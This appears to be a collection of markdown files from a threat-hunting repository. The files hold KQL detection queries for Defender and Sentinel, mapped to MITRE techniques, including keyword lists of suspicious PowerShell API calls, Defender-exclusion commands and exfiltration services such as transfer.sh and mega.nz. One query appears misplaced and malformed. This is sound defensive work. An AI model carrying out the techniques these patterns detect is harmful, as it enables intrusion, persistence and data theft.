| The risk addressed by this detection rule is the unauthorized installation of Azure ARC agents, which can be used as a persistence mechanism by attackers. This technique allows them to maintain long-term access to compromised systems and potentially exert control over a wider network. 16 | 17 | #### Author 18 | - **Name:** Gavin Knapp 19 | - **Github:** [https://github.com/m4nbat](https://github.com/m4nbat) 20 | - **Twitter:** [https://twitter.com/knappresearchlb](https://twitter.com/knappresearchlb) 21 | - **LinkedIn:** [https://www.linkedin.com/in/grjk83/](https://www.linkedin.com/in/grjk83/) 22 | - **Website:** 23 | 24 | #### References 25 | - [Azure ARC Agent Overview](https://learn.microsoft.com/en-us/azure/azure-arc/servers/agent-overview) 26 | - [Microsoft Security Blog on Azure ARC](https://www.microsoft.com/en-us/security/blog/2023/10/25/octo-tempest-crosses-boundaries-to-facilitate-extortion-encryption-and-destruction/) 27 | 28 | ## Defender For Endpoint 29 | ```KQL 30 | // Unexpected installation of azure arc agent - service installation 31 | let ServiceNames = datatable(name:string)["himds.exe","gc_arc_service.exe","gc_extension_service.exe"]; 32 | DeviceEvents 33 | | where ActionType =~ "ServiceInstalled" 34 | | extend ServiceName = tostring(parse_json(AdditionalFields).ServiceName) 35 | | extend ServiceAccount = tostring(parse_json(AdditionalFields).ServiceAccount) 36 | | extend ServiceStartType = tostring(parse_json(AdditionalFields).ServiceStartType) 37 | | extend ServiceType = tostring(parse_json(AdditionalFields).ServiceType) 38 | | where ServiceName has_any (ServiceNames) 39 | ``` 40 | 41 | ```KQL 42 | // Unexpected installation of azure arc agent - filepaths 43 | let AzureArcServicePaths = datatable(name:string)[@"\\AzureConnectedMachineAgent\\GCArcService\\GC"]; 44 | DeviceFileEvents 45 | | where ActionType =~ "FileCreated" 46 | | where FolderPath has_any (AzureArcServicePaths) 47 | ``` 48 | -------------------------------------------------------------------------------- /nf_ttp_t1547-001_yellowcockatoo_powershell_create_link_in_starup: -------------------------------------------------------------------------------- 1 | # *PowerShell Creating LNK Files within a Startup Directory Detection* 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Technique(s) 6 | 7 | | Technique ID | Title | Link | 8 | |--------------|-----------------------------|-----------------------------------------| 9 | | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001/) | 10 | 11 | #### Description 12 | This detection rule identifies instances of PowerShell creating LNK (shortcut) files in a startup directory, a technique often used in malware distribution, such as with the Yellow Cockatoo malware. This behavior can be indicative of malicious activity, as malware often uses LNK files in startup locations to execute upon system boot. However, benign homegrown utilities or installers may also create .lnk files in these locations, necessitating further investigation to confirm the nature of the activity. 13 | 14 | #### Risk 15 | The risk addressed by this rule is the unauthorized or malicious use of autostart mechanisms to maintain persistence or execute malware. This technique can lead to prolonged unauthorized access or the execution of harmful scripts without user intervention. 16 | 17 | #### Author 18 | - **Name:** Gavin Knapp 19 | - **Github:** [https://github.com/m4nbat](https://github.com/m4nbat) 20 | - **Twitter:** [https://twitter.com/knappresearchlb](https://twitter.com/knappresearchlb) 21 | - **LinkedIn:** [https://www.linkedin.com/in/grjk83/](https://www.linkedin.com/in/grjk83/) 22 | - **Website:** 23 | 24 | #### References 25 | - [Red Canary Intelligence Insights - December 2022](https://redcanary.com/blog/intelligence-insights-december-2022/) 26 | 27 | ## Defender For Endpoint 28 | ```KQL 29 | // PowerShell creating LNK files within a startup directory 30 | let trusedUtilsInstallingLnkInStartup = datatable (util:string)["mytrustedutility.exe"]; 31 | DeviceFileEvents 32 | | where ActionType =~ "FileCreated" 33 | and InitiatingProcessFileName =~ "powershell.exe" 34 | and FolderPath contains @"start menu\programs\startup" 35 | and not(InitiatingProcessCommandLine has_any (trusedUtilsInstallingLnkInStartup)) 36 | -------------------------------------------------------------------------------- /nf_ttp_t1562-001_disabledefender.md: -------------------------------------------------------------------------------- 1 | # TTP Detection Rule: Abusing PowerShell to disable Defender components 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Technique(s) 6 | 7 | | Technique ID | Title | Link | 8 | | --- | --- | --- | 9 | | T1562.001 | Impair Defenses: Disable or Modify Tools | [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001/)| 10 | 11 | #### Description 12 | Detection opportunity: Abusing PowerShell to disable Defender components 13 | 14 | We also observed at least one of these adversaries abusing PowerShell to exclude certain files or processes from Windows Defender scanning. Luckily, this is common tradecraft for which we’ve shared similar detection ideas on multiple occasions. The following may unearth this and other threats: 15 | 16 | #### Risk 17 | FIN7, ZLoader, and FakeBat have been observed performing this behaviour in recent intrusions. Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. 18 | 19 | #### Author 20 | - **Name:** Gavin Knapp 21 | - **Github:** https://github.com/m4nbat 22 | - **Twitter:** https://twitter.com/knappresearchlb 23 | - **LinkedIn:** https://www.linkedin.com/in/grjk83/ 24 | - **Website:** 25 | 26 | #### References 27 | - https://redcanary.com/blog/msix-installers/ 28 | 29 | ## Defender For Endpoint 30 | ```KQL 31 | //Detection opportunity 3: Abusing PowerShell to disable Defender components 32 | DeviceProcessEvents 33 | | where FileName =~ "powershell.exe" and ProcessCommandLine has_any ("Add-MpPreference","Set-MpPreference") and ProcessCommandLine has_any ("ExclusionProcess","ExclusionPath") 34 | ``` 35 | ## Sentinel 36 | ```KQL 37 | //Detection opportunity 3: Abusing PowerShell to disable Defender components 38 | DeviceProcessEvents 39 | | where FileName =~ "powershell.exe" and ProcessCommandLine has_any ("Add-MpPreference","Set-MpPreference") and ProcessCommandLine has_any ("ExclusionProcess","ExclusionPath") 40 | ``` 41 | -------------------------------------------------------------------------------- /nf_ttp_t1562.001_scattered-spider_abuse conditional_access_trusted_locations.md: -------------------------------------------------------------------------------- 1 | # *Scattered Spider Defense Evasion via Conditional Access Policies Detection* 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Technique(s) 6 | 7 | | Technique ID | Title | Link | 8 | |--------------|-----------------------------------|-------------------------------------------------------| 9 | | T1562.001 | Impair Defenses: Disable or Modify Tools | [Impair Defenses: Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001/) | 10 | 11 | #### Description 12 | This detection rule focuses on identifying modifications to Conditional Access Policies, a tactic employed by threat actors like Scattered Spider for defense evasion. The rule includes two queries: one for detecting updates to conditional access policies, specifically changes in 'locations' and 'excludeLocations', and another for identifying the addition of trusted locations, which can be indicative of an attacker trying to bypass security measures. 13 | 14 | #### Risk 15 | The risk addressed here is the manipulation of access controls to evade detection and maintain persistent access. Modifying conditional access policies can allow attackers to operate undetected within a network, as these changes might weaken the security posture or create blind spots. 16 | 17 | #### Author 18 | - **Name:** Gavin Knapp 19 | - **Github:** [https://github.com/m4nbat](https://github.com/m4nbat) 20 | - **Twitter:** [https://twitter.com/knappresearchlb](https://twitter.com/knappresearchlb) 21 | - **LinkedIn:** [https://www.linkedin.com/in/grjk83/](https://www.linkedin.com/in/grjk83/) 22 | - **Website:** 23 | 24 | #### References 25 | - [Microsoft Documentation on Conditional Access Policies](https://docs.microsoft.com/en-us/azure/active-directory/conditional-access/) 26 | - [MITRE ATT&CK on Defense Evasion](https://attack.mitre.org/tactics/TA0005/) 27 | 28 | ## Defender For Endpoint 29 | ```KQL 30 | AuditLogs 31 | | where OperationName =~ "Update conditional access policy" and TargetResources has_all ('locations','excludeLocations') 32 | -------------------------------------------------------------------------------- /nf_ttp_t1566-001_IPFS_Web3_Phishing.md: -------------------------------------------------------------------------------- 1 | # TTP Detection Rule: Check for Phishing Emails Using IPFS in Phishing Campaigns 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Technique(s) 6 | 7 | | Technique ID | Title | Link | 8 | |--------------|-----------------------------|------------------------------------------| 9 | | T1566.002 | Phishing: Spearphishing Link| [Phishing: Spearphishing Link](https://attack.mitre.org/techniques/T1566/002/) | 10 | 11 | #### Description 12 | This detection rule focuses on identifying phishing emails that potentially use the InterPlanetary File System (IPFS) to host malicious content. The usage of IPFS in phishing campaigns is a sophisticated technique as it can bypass conventional security measures. The rule involves checking for subsequent connections to IPFS-hosted sites, which could indicate the execution of a phishing attack utilizing this decentralized file hosting system. 13 | 14 | #### Risk 15 | The risk targeted by this detection rule is the exploitation of IPFS in phishing campaigns, a method that could lead to successful phishing attacks due to the unconventional nature of IPFS as a hosting platform. Phishing attacks using IPFS can be more difficult to detect and can pose a significant threat to organizational security. 16 | 17 | #### Author 18 | - **Name:** Gavin Knapp 19 | - **Github:** [https://github.com/m4nbat](https://github.com/m4nbat) 20 | - **Twitter:** [https://twitter.com/knappresearchlb](https://twitter.com/knappresearchlb) 21 | - **LinkedIn:** [https://www.linkedin.com/in/grjk83/](https://www.linkedin.com/in/grjk83/) 22 | - **Website:** 23 | 24 | #### References 25 | - [Talos Intelligence on IPFS Abuse](https://blog.talosintelligence.com/ipfs-abuse/) 26 | - [Cisco-Talos IOCs](https://github.com/Cisco-Talos/IOCs/tree/main/2022/11) 27 | - [Volexity Threat Intel](https://raw.githubusercontent.com/volexity/threat-intel/main/2023/2023-06-28%20POWERSTAR/attachments/ipfs.txt) 28 | 29 | ## Defender For Endpoint 30 | 31 | ```KQL 32 | //check for phishing emails potentially using ipfs to host malicious content used in phishing campaigns. 33 | let domains = externaldata (data:string)[h@"https://raw.githubusercontent.com/volexity/threat-intel/main/2023/2023-06-28%20POWERSTAR/attachments/ipfs.txt"]; 34 | EmailEvents 35 | | where Timestamp > ago (30d) 36 | | join EmailUrlInfo on NetworkMessageId 37 | | where Url has_any (domains) and DeliveryAction !~ "Blocked" 38 | ``` 39 | ## Sentinel 40 | 41 | ```KQL 42 | //check for subsequent connections to the site 43 | let domains = externaldata (data:string) 44 | [h@"https://raw.githubusercontent.com/volexity/threat-intel/main/2023/2023-06-28%20POWERSTAR/attachments/ipfs.txt"]; 45 | DeviceNetworkEvents 46 | | where TimeGenerated > ago (30d) 47 | | where RemoteUrl has_any (domains) 48 | ``` 49 | -------------------------------------------------------------------------------- /nf_ttp_t1567-002_scattered-spider_exfiltration.md: -------------------------------------------------------------------------------- 1 | # Exfiltration to Known Scattered Spider Domains Detection 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Technique(s) 6 | 7 | | Technique ID | Title | Link | 8 | |--------------|---------------------------------|----------------------------------------------| 9 | | T1567.002 | Exfiltration to Cloud Storage | [Exfiltration to Cloud Storage ](https://attack.mitre.org/techniques/T1567/002/) | 10 | 11 | #### Description 12 | This detection rule aims to identify data exfiltration attempts to domains known to be associated with the Scattered Spider threat group. The query searches for network events where devices connect to a list of predefined domains, such as "transfer.sh", "Mega.nz", and "riseup.net", which are commonly used by Scattered Spider for data exfiltration. 13 | 14 | #### Risk 15 | The primary risk addressed by this rule is the unauthorized transmission of sensitive data to external servers controlled by attackers. Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet. Exfiltration to these specific domains can signify an active compromise or data breach attempt. 16 | 17 | #### Author 18 | - **Name:** Gavin Knapp 19 | - **Github:** [https://github.com/m4nbat](https://github.com/m4nbat) 20 | - **Twitter:** [https://twitter.com/knappresearchlb](https://twitter.com/knappresearchlb) 21 | - **LinkedIn:** [https://www.linkedin.com/in/grjk83/](https://www.linkedin.com/in/grjk83/) 22 | - **Website:** 23 | 24 | #### References 25 | - [CISA Advisory on Data Exfiltration Techniques](https://www.cisa.gov/uscert/ncas/alerts) 26 | - [Microsoft Security Blog on Cyber Threats](https://www.microsoft.com/en-us/security/blog/) 27 | 28 | ## Defender For Endpoint 29 | ```KQL 30 | // Exfiltration to known Scattered Spider Domains 31 | let exfilDomains = dynamic(["transfer.sh", "Mega.nz", "riseup.net"]); 32 | DeviceNetworkEvents 33 | | where RemoteUrl in exfilDomains 34 | | summarize count() by DeviceName, Timestamp 35 | ``` 36 | 37 | ## Sentinel 38 | ```KQL 39 | // Exfiltration to known Scattered Spider Domains 40 | let exfilDomains = dynamic(["transfer.sh", "Mega.nz", "riseup.net"]); 41 | DeviceNetworkEvents 42 | | where RemoteUrl in exfilDomains 43 | | summarize count() by DeviceName, TimeGenerated 44 | 45 | ``` 46 | -------------------------------------------------------------------------------- /nf_vuln_linux_cups.md: -------------------------------------------------------------------------------- 1 | # TTP Detection Rule: Hunt queries for scoping the Linux CUPS Vulnerability 2 | 3 | ## Query Information 4 | 5 | #### MITRE ATT&CK Technique(s) 6 | 7 | | Technique ID | Title | Link | 8 | | --- | --- | --- | 9 | | | | | 10 | 11 | #### Description 12 | Hunt queries for scoping vulnerable devices with the Linux CUPS Vulnerability. 13 | 14 | From SANS ISC: 15 | _"CUPS may use "filters", executables that can be used to convert documents. The part responsible ("cups-filters") accepts unverified data that may then be executed as part of a filter operation. An attacker can use this vulnerability to inject a malicious "printer". The malicious code is triggered once a user uses this printer to print a document. This has little or no impact if CUPS is not listening on port 631, and the system is not used to print documents (like most servers). An attacker may, however, be able to trigger the print operation remotely. On the local network, this is exploitable via DNS service discovery. A proof of concept exploit has been made available."_ 16 | 17 | There is no patch right now. Disable and remove cups-browserd (you probably do not need it anyway). Update CUPS as updates become available. Stop UDP traffic on Port 631. 18 | 19 | Related CVE's 20 | - CVE-2024-47176 21 | - CVE-2024-47076 22 | - CVE-2024-47115 23 | - CVE-2024-47177 24 | 25 | #### Risk 26 | This vulnerability should be remediated on internet facing devices before proof of concept exploits are released and used in mass exploitation activity by threat actors. 27 | 28 | #### Author 29 | - **Name:** Gavin Knapp 30 | - **Github:** https://github.com/m4nbat 31 | - **Twitter:** https://twitter.com/knappresearchlb 32 | - **LinkedIn:** https://www.linkedin.com/in/grjk83/ 33 | - **Website:** 34 | 35 | #### References 36 | - https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/ 37 | https://isc.sans.edu/diary/Patch%20for%20Critical%20CUPS%20vulnerability%3A%20Don%27t%20Panic/31302 38 | 39 | ## Defender For Endpoint 40 | ```KQL 41 | DeviceTvmSoftwareInventory 42 | | where OSPlatform =~ "Linux" 43 | | where SoftwareName contains "cups" 44 | ``` 45 | ```KQL 46 | let linuxHosts = DeviceInfo 47 | | where OSPlatform =~ "Linux" | distinct DeviceId ; 48 | DeviceNetworkEvents 49 | | where DeviceId in~ (linuxHosts) 50 | | where LocalPort == 631 51 | ``` 52 | 53 | ```KQL 54 | //Maybe but untested: 55 | let linuxHosts = DeviceInfo 56 | | where OSPlatform =~ "Linux" | distinct DeviceId ; 57 | let devicesRunning631= DeviceNetworkEvents 58 | | where DeviceId in~ (linuxHosts) 59 | | where RemotePort == 631 or LocalPort == 631 60 | | distinct DeviceName, InitiatingProcessFileName; 61 | DeviceFileEvents 62 | | where DeviceId has_any (devicesRunning631) and ( FileName has_any (devicesRunning631) or InitiatingProcessFileName has_any (devicesRunning631) ) and ActionType =~ "FileCreated" 63 | ``` 64 | ```KQL 65 | //Internet facing devices with it: 66 | DeviceInfo 67 | | where Timestamp > ago(7d) 68 | | where IsInternetFacing and OSPlatform =~ "Linux" 69 | | extend InternetFacingInfo = AdditionalFields 70 | | extend InternetFacingReason = extractjson("$.InternetFacingReason", InternetFacingInfo, typeof(string)), InternetFacingLocalPort = extractjson("$.InternetFacingLocalPort", InternetFacingInfo, typeof(int)), InternetFacingScannedPublicPort = extractjson("$.InternetFacingPublicScannedPort", InternetFacingInfo, typeof(int)), InternetFacingScannedPublicIp = extractjson("$.InternetFacingPublicScannedIp", InternetFacingInfo, typeof(string)), InternetFacingLocalIp = extractjson("$.InternetFacingLocalIp", InternetFacingInfo, typeof(string)),InternetFacingTransportProtocol=extractjson("$.InternetFacingTransportProtocol", InternetFacingInfo, typeof(string)), InternetFacingLastSeen = extractjson("$.InternetFacingLastSeen", InternetFacingInfo, typeof(datetime)) 71 | | summarize arg_max(Timestamp, *) by DeviceId 72 | | join DeviceNetworkEvents on DeviceId 73 | | where LocalPort == 631 74 | ``` 75 | 76 | ## Defender EASM 77 | 78 | ```KQL 79 | // Detection opportunity 2: NetSupport running from unexpected directory 80 | DeviceProcessEvents 81 | | where ( ProcessVersionInfoCompanyName contains "netsupport" or ProcessVersionInfoProductName contains "netsupport" ProcessVersionInfoCompanyName contains "Crosstec" or ProcessVersionInfoProductName contains "Crosstec") and not ( FolderPath has_any ("Program Files (x86)\\","Program Files\\")) 82 | ``` 83 | -------------------------------------------------------------------------------- /powerShellHunts.md: -------------------------------------------------------------------------------- 1 | 2 | ## PowerShell creating external network connections followed by commands (may be noisy) 3 | 4 | DeviceNetworkEvents 5 | | where InitiatingProcessParentFileName != @"SenseIR.exe" 6 | | where ActionType == 'ConnectionSuccess' 7 | | where InitiatingProcessFileName has_any ("pwsh.exe","powershell.exe") 8 | | where RemoteUrl !contains "winatp-gw" 9 | | where RemoteIPType == "Public" 10 | | project Timestamp, DeviceName,NetConTimestamp = Timestamp, RemoteIP, RemoteUrl, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessCreationTime, InitiatingProcessId, InitiatingProcessParentFileName 11 | | join kind= leftouter( 12 | DeviceEvents 13 | | where ActionType == 'PowerShellCommand' 14 | | project PsCommandTimestamp = Timestamp, DeviceName, InitiatingProcessCommandLine, InitiatingProcessCreationTime, InitiatingProcessFileName, InitiatingProcessId, AdditionalFields, PSCommand=extractjson("$.Command", AdditionalFields, typeof(string)) 15 | ) on InitiatingProcessCommandLine, InitiatingProcessCreationTime, InitiatingProcessFileName, InitiatingProcessId, DeviceName 16 | | join kind=leftouter( 17 | DeviceProcessEvents 18 | | project ChildProcessStartTime = Timestamp, ChildProcessName = FileName, ChildProcessSHA1 = SHA1, ChildProcessCommandline = ProcessCommandLine, InitiatingProcessCommandLine, InitiatingProcessCreationTime, InitiatingProcessFileName, InitiatingProcessId, DeviceName 19 | ) on InitiatingProcessCommandLine, InitiatingProcessCreationTime, InitiatingProcessFileName, InitiatingProcessId, DeviceName 20 | | project DeviceName, NetConTimestamp, RemoteIP, RemoteUrl,InitiatingProcessParentFileName,InitiatingProcessFileName, InitiatingProcessCommandLine, PsCommandTimestamp, PSCommand, ChildProcessStartTime, ChildProcessName, ChildProcessSHA1, ChildProcessCommandline 21 | 22 | ## Powershell creating .exe 23 | 24 | DeviceFileEvents 25 | | where InitiatingProcessParentFileName != @"SenseIR.exe" 26 | | where InitiatingProcessFileName has_any ("pwsh.exe","powershell.exe") 27 | | where ActionType == 'FileCreated' 28 | | where FileName endswith ".exe" 29 | | project Timestamp, FileCreationTimestamp = Timestamp, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName, SHA1, FileName, DeviceName 30 | | join ( 31 | DeviceProcessEvents 32 | | project DeviceName, SHA1, FileName, ProcessCreationTimestamp = Timestamp, ProcessCommandLine, FolderPath, ProcessCreationParentName = InitiatingProcessFileName, ProcessCreationParentCmdline = InitiatingProcessCommandLine, ProcessCreationParentFolderPath = InitiatingProcessFolderPath, ProcessCreationGrandParentName = InitiatingProcessParentFileName 33 | ) on FileName, SHA1, DeviceName 34 | | project DeviceName, FileCreationTimestamp, FileName, SHA1, ProcessCreationTimestamp, FolderPath, ProcessCommandLine, ProcessCreationParentName, ProcessCreationParentCmdline, ProcessCreationParentFolderPath, ProcessCreationGrandParentName 35 | 36 | 37 | ## PowerShell DLLs being called by non-PowerShell processes 38 | 39 | ``` 40 | DeviceImageLoadEvents 41 | | where TimeGenerated > ago(30d) 42 | | where FileName in~ ("System.Management.Automation.Dll","System.Management.Automation.ni.Dll","System.Reflection.Dl") and ActionType =~ "ImageLoaded" 43 | | where InitiatingProcessFolderPath !in~ (@"c:\windows\system32\windowspowershell\v1.0\powershell.exe",@"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe",@"c:\program files\microsoft visual studio\2022\community\common7\ide\devenv.exe") and not (InitiatingProcessFileName =~ "mscorsvw.exe" and InitiatingProcessCommandLine has_all (@"mscorsvw.exe","-StartupEvent","-InterruptEvent","-NGENProcess","-Pipe","-Comment","NGen Worker Process")) and not (InitiatingProcessFolderPath startswith @"c:\program files\microsoft visual studio\" and InitiatingProcessFileName startswith "ServiceHub") 44 | ``` 45 | -------------------------------------------------------------------------------- /powershell_dirty_word_detection.md: -------------------------------------------------------------------------------- 1 | # 2 | 3 | ## SOURCE 4 | 5 | - https://gist.github.com/nasbench/50cd0b64bedacabccecc9149c15228da#file-pwsh_dirty_words-yml 6 | 7 | ## MDE 8 | 9 | ``` 10 | let dirtyWordList = datatable(word:string)["Add-Type" 11 | ,"AddSecurityPackage" 12 | ,"AdjustTokenPrivileges" 13 | ,"AllocHGlobal" 14 | ,"BindingFlags" 15 | ,"Bypass" 16 | ,"CloseHandle" 17 | ,"CreateDecryptor" 18 | ,"CreateEncryptor" 19 | ,"CreateProcessWithToken" 20 | ,"CreateRemoteThread" 21 | ,"CreateThread" 22 | ,"CreateType" 23 | ,"CreateUserThread" 24 | ,"Cryptography" 25 | ,"CryptoServiceProvider" 26 | ,"CryptoStream" 27 | ,"DangerousGetHandle" 28 | ,"DeclaringMethod" 29 | ,"DeclaringType" 30 | ,"DefineConstructor" 31 | ,"DefineDynamicAssembly" 32 | ,"DefineDynamicModule" 33 | ,"DefineEnum" 34 | ,"DefineField" 35 | ,"DefineLiteral" 36 | ,"DefinePInvokeMethod" 37 | ,"DefineType" 38 | ,"DeflateStream" 39 | ,"DeviceIoControl" 40 | ,"DllImport" 41 | ,"DuplicateTokenEx" 42 | ,"Emit" 43 | ,"EncodedCommand" 44 | ,"EnumerateSecurityPackages" 45 | ,"ExpandString" 46 | ,"FreeHGlobal" 47 | ,"FreeLibrary" 48 | ,"FromBase64String" 49 | ,"GetAssemblies" 50 | ,"GetAsyncKeyState" 51 | ,"GetConstructor" 52 | ,"GetConstructors" 53 | ,"GetDefaultMembers" 54 | ,"GetDelegateForFunctionPointer" 55 | ,"GetEvent" 56 | ,"GetEvents" 57 | ,"GetField" 58 | ,"GetFields" 59 | ,"GetForegroundWindow" 60 | ,"GetInterface" 61 | ,"GetInterfaceMap" 62 | ,"GetInterfaces" 63 | ,"GetKeyboardState" 64 | ,"GetLogonSessionData" 65 | ,"GetMember" 66 | ,"GetMembers" 67 | ,"GetMethod" 68 | ,"GetMethods" 69 | ,"GetModuleHandle" 70 | ,"GetNestedType" 71 | ,"GetNestedTypes" 72 | ,"GetPowerShell" 73 | ,"GetProcAddress" 74 | ,"GetProcessHandle" 75 | ,"GetProperties" 76 | ,"GetProperty" 77 | ,"GetTokenInformation" 78 | ,"GetTypes" 79 | ,"ILGenerator" 80 | ,"ImpersonateLoggedOnUser" 81 | ,"InteropServices" 82 | ,"IntPtr" 83 | ,"InvokeMember" 84 | ,"kernel32" 85 | ,"LoadLibrary" 86 | ,"LogPipelineExecutionDetails" 87 | ,"MakeArrayType" 88 | ,"MakeByRefType" 89 | ,"MakeGenericType" 90 | ,"MakePointerType" 91 | ,"Marshal" 92 | ,"memcpy" 93 | ,"MemoryStream" 94 | ,"Methods" 95 | ,"MiniDumpWriteDump" 96 | ,"NonPublic" 97 | ,"OpenDesktop" 98 | ,"OpenProcess" 99 | ,"OpenProcessToken" 100 | ,"OpenThreadToken" 101 | ,"OpenWindowStation" 102 | ,"PasswordDeriveBytes" 103 | ,"Properties" 104 | ,"ProtectedEventLogging" 105 | ,"PtrToString" 106 | ,"PtrToStructure" 107 | ,"ReadProcessMemory" 108 | ,"ReflectedType" 109 | ,"RevertToSelf" 110 | ,"RijndaelManaged" 111 | ,"ScriptBlockLogging" 112 | ,"SetInformationProcess" 113 | ,"SetThreadToken" 114 | ,"SHA1Managed" 115 | ,"StructureToPtr" 116 | ,"ToBase64String" 117 | ,"TransformFinalBlock" 118 | ,"TypeHandle" 119 | ,"TypeInitializer" 120 | ,"UnderlyingSystemType" 121 | ,"UnverifiableCodeAttribute" 122 | ,"VirtualAlloc" 123 | ,"VirtualFree" 124 | ,"VirtualProtect" 125 | ,"WriteByte" 126 | ,"WriteInt32" 127 | ,"WriteProcessMemory" 128 | ,"ZeroFreeGlobalAllocUnicode"]; 129 | let excludedProcess = datatable(name:string)[@'exclusion1','exclusion2']; 130 | let excludedCommandLines = datatable(name:string)[@'exclusion1',@'exclusion2']; 131 | DeviceProcessEvents 132 | | where ( InitiatingProcessCommandLine has_any (dirtyWordList) or ProcessCommandLine has_any (dirtyWordList) ) 133 | | where not ( FileName has_any (excludedProcess) or InitiatingProcessFileName has_any (excludedProcess) or InitiatingProcessParentFileName has_any (excludedProcess) ) or ( InitiatingProcessCommandLine has_any (excludedCommandLines) or ProcessCommandLine has_any (excludedCommandLines) ) 134 | ``` 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | -------------------------------------------------------------------------------- /proxy_shell_kusto_queries.md: -------------------------------------------------------------------------------- 1 | # ProxyNotShell exploitation of Exchange servers 2 | # Source: //https://redcanary.com/blog/intelligence-insights-january-2023/ 3 | 4 | //Rundll32 executing DLL files located in the Windows Temp directory 5 | //The following detection analytic identifies instances of the Windows Rundll32 process loading code from DLL files located in the Windows Temp directory. It’s possible that some enterprise software in your environment will execute DLLs from windows\temp, so additional investigation may be needed to determine if the behavior is malicious. 6 | let trustedDlls = datatable(dll:string)["trustedDll.dll"]; //place trusted DLLs that launch from temp folders here. 7 | //https://redcanary.com/blog/intelligence-insights-january-2023/ 8 | DeviceProcessEvents 9 | | where ((InitiatingProcessFileName =~ "rundll32.exe" and ProcessCommandLine contains @"windows\temp") or (InitiatingProcessParentFileName =~ "rundll32.exe" and InitiatingProcessCommandLine contains @"windows\temp")) and not(InitiatingProcessCommandLine has_any (trustedDlls) or ProcessCommandLine has_any (trustedDlls)) 10 | 11 | //Look for web shell files named iisstart.aspx and logout.aspx being written to inetpub\wwwroot\aspnet_client and exchange server\v15\frontend\httpproxy\ecp\auth 12 | //https://redcanary.com/blog/intelligence-insights-january-2023/ 13 | DeviceFileEvents 14 | | where ActionType =~ "FileCreated" and FileName has_any ("iisstart.exe","logout.aspx") and FolderPath has_any (@"inetpub\wwwroot\aspnet_client",@"server\v15\frontend\httpproxy\ecp\auth") 15 | 16 | //Activity initiated from w3wp.exe with a command line containing MSExchangePowerShellAppPool. Based on Red Canary testing, the activity we saw, and other researchers’ observations, malicious activity spawning from a w3wp.exe process with this command line is an indicator of potential ProxyNotShell exploitation. 17 | //https://redcanary.com/blog/intelligence-insights-january-2023/ 18 | DeviceProcessEvents 19 | | where InitiatingProcessFileName =~ "w3wp.exe" and InitiatingProcessCommandLine contains "MSExchangePowerShellAppPool" 20 | 21 | //We observed execution of Visual Basic Scripts (.vbs) from the windows\temp folder writing a malicious Meterpreter executable and subsequently making network connections. The executable’s internal file name, ab.exe, is the default metadata used by Meterpreter for its payloads. 22 | //https://redcanary.com/blog/intelligence-insights-january-2023/ 23 | DeviceFileEvents 24 | | where InitiatingProcessFileName endswith ".vbs" and InitiatingProcessFolderPath contains @"windows\temp" and FileName matches regex "[a-zA-Z]{2}\\.exe" 25 | -------------------------------------------------------------------------------- /raas_blackbyte.md: -------------------------------------------------------------------------------- 1 | # Title 2 | Blackbyte Hunt Rules 3 | 4 | # Description 5 | 6 | 7 | # Source 8 | https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/ 9 | 10 | # MITRE ATT&CK 11 | - T1505.003: Server Software Component: Web Shell 12 | - T1490: Inhibit System Recovery 13 | - T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 14 | - T1537: Transfer Data to Cloud Account 15 | 16 | ## ProxyShell web shell creation events 17 | 18 | ``` 19 | DeviceProcessEvents 20 | | where ProcessCommandLine has_any ("ExcludeDumpster","New-ExchangeCertificate") and ProcessCommandLine has_any ("-RequestFile","-FilePath") 21 | ``` 22 | 23 | ## Suspicious vssadmin events 24 | 25 | ``` 26 | DeviceProcessEvents 27 | | where ProcessCommandLine has_any ("vssadmin","vssadmin.exe") and ProcessCommandLine has "Resize ShadowStorage" and ProcessCommandLine has_any ("MaxSize=401MB"," MaxSize=UNBOUNDED") 28 | ``` 29 | 30 | ## Detection for persistence creation using Registry Run keys 31 | 32 | ``` 33 | DeviceRegistryEvents 34 | | where ActionType == "RegistryValueSet" 35 | | where (RegistryKey has @"Microsoft\Windows\CurrentVersion\RunOnce" and RegistryValueName == "MsEdgeMsE") 36 | or (RegistryKey has @"Microsoft\Windows\CurrentVersion\RunOnceEx" and RegistryValueName == "MsEdgeMsE") 37 | or (RegistryKey has @"Microsoft\Windows\CurrentVersion\Run" and RegistryValueName == "MsEdgeMsE") 38 | | where RegistryValueData startswith @"rundll32" 39 | | where RegistryValueData endswith @".dll,Default" 40 | | project Timestamp,DeviceId,DeviceName,ActionType,RegistryKey,RegistryValueName,RegistryValueData 41 | ``` 42 | 43 | ## Exfiltration 44 | 45 | ``` 46 | //suitable for hunting exfiltration to mega.nz 47 | DeviceNetworkEvents 48 | | where RemoteUrl contains "g.api.mega.co.nz" 49 | ``` 50 | 51 | ## Microsoft Defender for Endpoint 52 | 53 | The following alerts might indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity. 54 | 55 | ‘CVE-2021-31207’ exploit malware was detected 56 | An active ‘NetShDisableFireWall’ malware in a command line was prevented from executing. 57 | Suspicious registry modification. 58 | ‘Rtcore64’ hacktool was detected 59 | Possible ongoing hands-on-keyboard activity (Cobalt Strike) 60 | A file or network connection related to a ransomware-linked emerging threat activity group detected 61 | Suspicious sequence of exploration activities 62 | A process was injected with potentially malicious code 63 | Suspicious behavior by cmd.exe was observed 64 | ‘Blackbyte’ ransomware was detected 65 | -------------------------------------------------------------------------------- /rclone_detection.md: -------------------------------------------------------------------------------- 1 | # 